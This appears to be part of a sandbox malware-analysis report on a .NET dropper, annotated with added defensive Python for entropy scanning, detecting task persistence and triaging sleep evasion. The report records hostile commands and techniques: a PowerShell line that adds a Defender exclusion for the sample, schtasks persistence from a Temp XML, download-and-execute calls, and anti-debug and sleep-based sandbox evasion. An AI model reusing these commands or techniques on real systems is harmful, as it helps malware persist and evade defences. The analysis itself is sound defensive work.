Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, O7QaxOP1WHfuKiysCB.cs | High entropy of concatenated method names: 'iF1iqN2Ix7', 'qyJiUJAgbi', 'atRitsUWSG', 'UoEi0ZTDMw', 'dquimOLOel', 'cZ3iEOe2tr', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, UsNrrbl72Ir1JF4Inh.cs | High entropy of concatenated method names: 'RR5iJQSZlT', 'aM7iQBhrAS', 'EZKiwuLK8J', 'hDPiAhGv1Q', 'GGJiPL0pxD', 'vegikF3Qys', 'Qrwivv9eID', 'pOEi6NrRx0', 'xqfiBhaXAK', 'eR8irPgAc5'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, ULLvmxT725yvDGgCf2.cs | High entropy of concatenated method names: 'Kufs1jK0Hw', 'DIrshoW4RW', 'zFvsmLWmUu', 'lwisncaH5M', 'bBEsUdMnPP', 'w0kstIFyvh', 'I1ls0VZ5DC', 'tNWsEiwVEj', 'MkwsCcVV2Q', 'caEsWea0Dc'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, DSSwTQO1NWXixqGlCL.cs | High entropy of concatenated method names: 'zlBQmA66Lh', 'EEQQnjJRDT', 'A1eQNBJOhJ', 'P55Qaden2w', 't1bQ96PaJw', 'HNyQ3WKvm1', 'yClQMfqAY5', 'AODQuFaXhT', 'j5aQg4rj8o', 'alRQDH46qh'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, oT9uaNmRpGhyBXALGV.cs | High entropy of concatenated method names: 'O8VkJWd4Cf', 'bbLkwssU52', 'quRkPAjuXO', 'KmOPD0dkpB', 's50PzKtHQL', 'xX2kOGa260', 'TAdkI3bhaB', 'TBdk2twsMf', 'Acwky4QwXT', 'ueckeQIEnl'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, x2AqPHq2qhLej4XYqg.cs | High entropy of concatenated method names: 'QoIPN1ljCY', 'B0WPaOkxZO', 'A3tP9aiSEI', 'ToString', 'HsiP3vy0jA', 'e2sPMT2cGD', 'VmfrR0l3MWhDe4bkGsg', 'UBP4OtlNENICldRnPou', 'VU6ZITlrYnYsgKZkO7Q', 'OFxHAyly07COCRvgANx'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, flsNFv1jqRn4UFfbYv.cs | High entropy of concatenated method names: 'AK1Yuw30dv', 'DMNYDKofPr', 't1tiO2Iai7', 'gi5iIVjKpB', 'Xp4YpUP5CX', 'M75Yhl2fHN', 'EG4Y81lKAP', 'qmWYmw7roK', 'lAHYnUmdON', 'EwkYNZeps6'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, qVbjiYeg51FIPLgDide.cs | High entropy of concatenated method names: 'zwH4cUCJDl', 'vdX4ZNxuaD', 'LOa4Sx6V7l', 'uFB4fUUoZO', 'Oft4FIqtry', 'Qce4TCe74A', 'wl345clhix', 't2K4Red2VO', 'Y4M4GK1488', 'HmA4Xk0S9m'
Source: 0.2.HUED23EDE5UGRFQ.exe.38aae30.1.raw.unpack, yxkao7hiFSsCxJrj6x.cs | High entropy of concatenated method names: 'Dispose', 'scYIg4SsGH', 'NsG2UcEpqL', 'aYvjjmHQdT', 'xXHIDRqdFg', 'sCgIzqmx7K', 'ProcessDialogKey', 'FDb2ONo6rM', 'XZY2IVTUPT', 'fVb22oh36r'
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00406EB0 ShellExecuteW,URLDownloadToFileW
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | File created: C:\Users\user\AppData\Roaming\jdSldfVS.exe
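Two of the static findings in this block are Shannon-entropy heuristics: the .text section of both the submitted file and the dropped copy measures 7.979 bits per byte, just under the 8.0 ceiling that an encrypted or compressed blob produces, and the unpacked .NET module has method names whose concatenation looks random. Together with the InitializeComponent call to System.Reflection.Assembly.Load(byte[]) that is the signature of a .NET stub that carries its real payload as opaque bytes and loads it at run time. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it walks a PE section table with the standard library only, reports entropy per section, and applies the same per-character measure to method-name lists copied from the findings above. The PE it scans is constructed inside the script (a 16 KiB pseudo-random .text standing in for an encrypted payload beside a low-entropy .rdata), and the 7.2 and 4.8 thresholds are assumptions chosen to separate the two cases, not published cut-offs.

```python
import hashlib
import math
import struct


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one (same scale as the report)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes):
    """Walk the PE section table and return (name, raw_size, entropy) for each section."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", image, coff + 2)[0]
    opt_size = struct.unpack_from("<H", image, coff + 16)[0]
    table = coff + 20 + opt_size                          # first IMAGE_SECTION_HEADER
    result = []
    for i in range(num_sections):
        off = table + 40 * i
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<IIII", image, off + 8)
        result.append((name, raw_size, shannon_entropy(image[raw_ptr:raw_ptr + raw_size])))
    return result


PACKED_THRESHOLD = 7.2   # assumption: ordinary compiled code/IL sits well below this


def packed_sections(image: bytes, threshold: float = PACKED_THRESHOLD):
    """Names of sections whose content is dense enough to be encrypted/compressed."""
    return [name for name, _size, ent in pe_sections(image) if ent >= threshold]


def name_entropy(names) -> float:
    """Entropy over the characters of all method names concatenated, as in the report heuristic."""
    return shannon_entropy("".join(names).encode("utf-8"))


NAME_THRESHOLD = 4.8     # assumption: chosen from the contrast below, not a published cut-off


def is_likely_obfuscated(names, threshold: float = NAME_THRESHOLD) -> bool:
    return name_entropy(names) >= threshold


def _pseudo_random(n: int, seed: bytes = b"constructed .text blob") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for an encrypted payload."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_pe(sections):
    """Assemble a minimal PE32 image from (name, bytes) pairs; constructed for this example only."""
    opt_size, align = 0xE0, 0x200
    hdr_len = -(-(0x40 + 4 + 20 + opt_size + 40 * len(sections)) // align) * align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                              # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                                # PE32 magic
    table, body, raw_ptr, vaddr = bytearray(), bytearray(), hdr_len, 0x1000
    for name, data in sections:
        raw_size = -(-len(data) // align) * align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             vaddr, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        vaddr += -(-raw_size // 0x1000) * 0x1000
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return image.ljust(hdr_len, b"\0") + bytes(body)


# Method names copied from the report's findings (obfuscated) and from its clean-looking ones.
OBFUSCATED_NAMES = ['Hk4PbZ6o4W', 'VnOPQM2EvY', 'dQ3PAdMbr5', 'RrjPkQgbk9', 'GdUPvUwXie',
                    'Iu5A9QMDGZ', 'swAA3J5jSD', 'OGQAMjonbp', 'IlVAubPjAv', 'uaTAgVOgfP']
CLEAN_NAMES = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ToString', 'Dispose',
               'ProcessDialogKey', 'Next', 'NextBytes', 'InitializeComponent']

# Constructed sample image: dense .text next to a repetitive .rdata.
SAMPLE_PE = build_pe([(".text", _pseudo_random(16384)),
                      (".rdata", b"This program cannot be run in DOS mode.\r\n$" * 40)])

if __name__ == "__main__":
    for name, size, ent in pe_sections(SAMPLE_PE):
        print(f"{name:<8} {size:>6} bytes  entropy {ent:.3f}")
    print("packed sections:", packed_sections(SAMPLE_PE))
    print("obfuscated names:", round(name_entropy(OBFUSCATED_NAMES), 2), is_likely_obfuscated(OBFUSCATED_NAMES))
    print("clean names:     ", round(name_entropy(CLEAN_NAMES), 2), is_likely_obfuscated(CLEAN_NAMES))
```

Run it against a real file with pe_sections(open(path, "rb").read()). A near-8.0 .text on a .NET executable whose InitializeComponent calls Assembly.Load(byte[]) is the combination the report flags: those bytes are not IL the CLR executes directly, they are a blob the stub decodes and loads at run time, so the payload only exists in memory (which is why the same obfuscated classes turn up in three memory dumps above). Both measures are triage signals rather than verdicts: an installer with a large embedded resource scores high on section entropy, and the name check should be applied to the unpacked module's names, not to compiler-generated ones.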

                  Boot Survival

Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
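The schtasks line above registers the dropped copy as a scheduled task from an XML definition that was written to the user's Temp folder and named like a random tmp file, the pattern commonly described as a scheduled task created from a temp-location XML. The Python below is an added example, not the report's own logic or any published rule's code; it runs that check over process-creation records constructed here in a Sysmon Event ID 1 / Security 4688 shape, with the first record copied from the report and the other three invented for contrast. It matches on the image file name rather than its directory because the report shows the 32-bit sample launching C:\Windows\SysWOW64\schtasks.exe while the command line names System32 (WOW64 file-system redirection), and a rule keyed on the full System32 path would miss it.

```python
import re

# Constructed process-creation records. The first command line is the one recorded in the
# report above; the other three are invented here for contrast (a vendor task registered
# from ProgramData, a /Query, and a task whose XML comes from %TEMP%).
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" '
                r'/XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "Microsoft\Office\Updater" /XML "C:\ProgramData\Vendor\updater.xml"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /Query /TN Updates\jdSldfVS"},
    {"parent": r"C:\Users\user\AppData\Local\Temp\setup.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /tn Updater /xml %TEMP%\task.xml"},
]

# Locations a legitimate installer has little reason to stage a task definition in.
TEMP_LOCATION = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%TEMP%|%TMP%", re.IGNORECASE)
_ARG = r'(?:"([^"]*)"|(\S+))'   # a quoted value (may contain spaces) or a bare token


def flag_value(cmdline: str, flag: str):
    """Return the argument following /<flag>, quoted or bare, or None if the flag is absent."""
    m = re.search(r"/" + re.escape(flag) + r"\s+" + _ARG, cmdline, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def schtasks_xml_from_temp(event: dict):
    """Flag 'schtasks /Create ... /XML <file>' when the XML sits in a temp location."""
    if not event["image"].lower().endswith("\\schtasks.exe"):   # name, not directory (WOW64)
        return None
    cmd = event["cmdline"]
    if not re.search(r"/create\b", cmd, re.IGNORECASE):
        return None
    xml = flag_value(cmd, "xml")
    if xml is None or not TEMP_LOCATION.search(xml):
        return None
    return {"task": flag_value(cmd, "tn"), "xml": xml, "parent": event["parent"]}


def scan(events):
    return [hit for hit in map(schtasks_xml_from_temp, events) if hit]


# Assumption: default %SystemRoot%; the task definition and its TaskCache entry outlive the tmp file.
TASKS_DIR = r"C:\Windows\System32\Tasks"
TASKCACHE_TREE = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree"


def task_artifacts(task_name: str):
    """Where the registered task persists on disk and in the registry after the XML is gone."""
    rel = task_name.strip("\\")
    return {"file": TASKS_DIR + "\\" + rel, "registry": TASKCACHE_TREE + "\\" + rel}


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"task {hit['task']!r} registered from {hit['xml']} by {hit['parent']}")
        print("  collect:", task_artifacts(hit["task"]))
```

On a live host the tmpAF95.tmp file may already be gone by the time anyone looks, but the registered definition survives it: schtasks writes the task XML under C:\Windows\System32\Tasks\Updates\jdSldfVS and the Task Scheduler service records it under the TaskCache\Tree key, so collect both (plus the Temp file if it still exists) before removing the task. The trigger, the action path (C:\Users\user\AppData\Roaming\jdSldfVS.exe in this run) and the run-as user all live in that XML.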

                  Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries)
Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process information set: NOOPENFILEERRORBOX (44 identical entries)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Process information set: NOOPENFILEERRORBOX (71 identical entries)

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040F7A7 Sleep,ExitProcess
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: AC0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: 2490000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: 4490000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: 77C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: 87C0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: 8980000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: 9980000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory allocated: 1590000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory allocated: 3210000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory allocated: 2FD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory allocated: 8060000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory allocated: 9060000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory allocated: 9210000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Memory allocated: A210000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041A748 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6616
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 371
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6564
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 398
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Window / User API: threadDelayed 409
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Window / User API: threadDelayed 9065
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Window / User API: foregroundWindowGot 1771
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | API coverage: 6.4 %
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 1012 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3532 | Thread sleep count: 6616 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3532 | Thread sleep count: 371 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044 | Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2304 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6244 | Thread sleep time: -4611686018427385s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1936 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 4088 | Thread sleep count: 252 > 30
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 4088 | Thread sleep time: -126000s >= -30000s
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328 | Thread sleep count: 409 > 30
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328 | Thread sleep time: -1227000s >= -30000s
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328 | Thread sleep count: 9065 > 30
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe TID: 3328 | Thread sleep time: -27195000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe TID: 4196 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 identical entries)
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0044E879 FindFirstFileExA
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040783C FindFirstFileW,FindNextFileW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 identical entries)
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Thread delayed: delay time: 922337203685477
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001078000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW3
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001078000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004432B5 mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00412077 GetProcessHeap,HeapFree
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00434B47 SetUnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exe | Code function: 17_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Memory allocated: page read and write | page guard
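The sleep entries in this section are easier to read once the arithmetic behind them is made explicit. The Python below is an added example, not part of the Joe Sandbox report: it aggregates thread-sleep events of the kind listed above and applies the same two thresholds the report uses ("> 30" calls and ">= 30000" total). The per-call intervals of 3000 ms and 500 ms are inferred from the report's own figures (9065 x 3000 = 27,195,000 and 252 x 500 = 126,000, 409 x 3000 = 1,227,000), the unit is assumed to be milliseconds, and the delay value 922337203685477 is Int64.MaxValue in 100 ns ticks divided by 10,000, i.e. an effectively infinite wait. The notepad.exe entry is a constructed benign baseline.

```python
# Added example (not from the report): sleep-evasion triage over thread-sleep events.
# Sample events are constructed from the page's figures; the 3000 ms / 500 ms per-call
# intervals are inferred (count x interval == reported total), not observed directly.

INT64_MAX_MS = (2**63 - 1) // 10_000   # 922337203685477: Int64.MaxValue 100-ns ticks as ms
SANDBOX_BUDGET_MS = 30_000             # the ">= 30000" threshold in the report lines (assumed ms)
SLEEP_LOOP_MIN_CALLS = 30              # the "> 30" threshold in the report lines

# (process, thread id, number of sleep calls, per-call interval in ms)
SAMPLE_SLEEPS = [
    ("HUED23EDE5UGRFQ.exe", 1012, 1, INT64_MAX_MS),   # single "infinite" wait
    ("HUED23EDE5UGRFQ.exe", 4088, 252, 500),          # 252 x 500 ms   = 126,000 ms
    ("HUED23EDE5UGRFQ.exe", 3328, 409, 3000),         # 409 x 3000 ms  = 1,227,000 ms
    ("HUED23EDE5UGRFQ.exe", 3328, 9065, 3000),        # 9065 x 3000 ms = 27,195,000 ms
    ("jdSldfVS.exe", 4196, 1, INT64_MAX_MS),
    ("notepad.exe", 777, 5, 100),                     # constructed benign baseline
]


def summarize(sleeps):
    """Aggregate per (process, tid): call count, cumulative delay, infinite-wait flag."""
    per_thread = {}
    for proc, tid, count, interval_ms in sleeps:
        rec = per_thread.setdefault((proc, tid), {"calls": 0, "total_ms": 0, "infinite": False})
        rec["calls"] += count
        rec["total_ms"] += count * interval_ms
        if interval_ms >= INT64_MAX_MS:
            rec["infinite"] = True
    return per_thread


def evasion_verdicts(sleeps, budget_ms=SANDBOX_BUDGET_MS, min_calls=SLEEP_LOOP_MIN_CALLS):
    """Return {(process, tid): [reasons]} for threads that look like they stall analysis.

    Three independent signals, mirroring the report: an infinite wait, a sleep loop
    (many calls of a short interval), and a cumulative delay that outlasts the budget.
    """
    verdicts = {}
    for key, rec in summarize(sleeps).items():
        reasons = []
        if rec["infinite"]:
            reasons.append("infinite wait (Int64.MaxValue ticks)")
        if rec["calls"] > min_calls:
            reasons.append(f"sleep loop: {rec['calls']} calls")
        if rec["total_ms"] >= budget_ms:
            reasons.append(f"cumulative delay {rec['total_ms']} ms >= {budget_ms} ms budget")
        if reasons:
            verdicts[key] = reasons
    return verdicts


if __name__ == "__main__":
    for (proc, tid), reasons in sorted(evasion_verdicts(SAMPLE_SLEEPS).items()):
        print(f"{proc} TID {tid}: " + "; ".join(reasons))
```

Two caveats when reading the rest of this section. The leading minus sign on the report's "Thread sleep time" values is how the tool renders them (NT-level relative timeouts are negative 100 ns intervals), not a negative duration. And the "memory reserve | memory write watch" allocations are weak evidence on their own for this sample: the .NET runtime's garbage collector reserves its heap with MEM_WRITE_WATCH, so a managed executable produces those entries without any evasion intent; the sleep loops and the PEB read at fs:[30h] are the stronger indicators here.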

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe"
